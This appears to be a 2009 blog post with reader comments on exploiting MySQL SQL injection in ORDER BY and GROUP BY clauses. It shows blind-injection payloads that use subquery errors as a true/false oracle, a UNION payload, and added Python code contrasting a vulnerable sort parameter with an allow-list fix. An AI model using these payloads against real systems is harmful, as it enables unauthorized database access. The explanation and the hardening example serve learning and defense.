Exploiting SQL injections where the input lands in the ORDER BY clause is a bit tricky, because UNION queries are not permitted after an ORDER BY clause. The following can be used in such a scenario to turn it into a blind SQL injection case:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
----
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
----
For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above will also work for blind injection cases:
mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
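As an added example, not from the original post: the code pattern behind this class of bug, a sort column spliced straight into the query string because ORDER BY targets cannot be bound parameters, next to the allow-list fix that closes it. It uses Python's sqlite3 with a constructed in-memory table standing in for the post's `news` table; the function and column names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the post's `news` table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "b"), (2, "a"), (3, "c")])
    return conn


def vulnerable_query(conn, sort):
    # Placeholders cannot name an ORDER BY column, so code like this
    # formats the request value into the SQL text. Everything the caller
    # supplies after the column name is executed as SQL, which is exactly
    # the situation the post exploits.
    sql = f"SELECT id FROM news WHERE id > 0 ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql)]


# Hardened form: the request value is only ever a key into this mapping,
# so the text that reaches the query is always one of our own literals.
ALLOWED_SORT = {"id": "id", "title": "title"}
ALLOWED_DIRECTION = {"asc": "ASC", "desc": "DESC"}


def safe_query(conn, sort, direction="asc"):
    col = ALLOWED_SORT.get(sort)
    dirn = ALLOWED_DIRECTION.get(direction)
    if col is None or dirn is None:
        # Reject rather than sanitise: there is no legitimate sort value
        # that is not already in the allow-list.
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT id FROM news WHERE id > 0 ORDER BY {col} {dirn}"
    return [row[0] for row in conn.execute(sql)]
```

A request of `title DESC, id` changes the ordering in the vulnerable version (the extra text ran as SQL) and is rejected outright by the hardened one.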
8:59 pm on April 15th, 2009
Great. That's exactly what I was searching for.
Not so great: I do not understand what the example should do…
8:32 am on April 16th, 2009
What version of MySQL are you trying this on?
I think this does not work in some of the recent versions.
10:07 pm on April 16th, 2009
Server Version: 5.1.30
I meant especially the "order by" case.
What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?
3:00 pm on April 17th, 2009
This is how you can convert this into standard true and false responses. Think of that error as a 'false' response, which you get when doing boolean injection;
e.g. id=100 and 1=1; id=100 and 1=2;
----
2:34 pm on April 21st, 2009
of course -.-’
Thank you.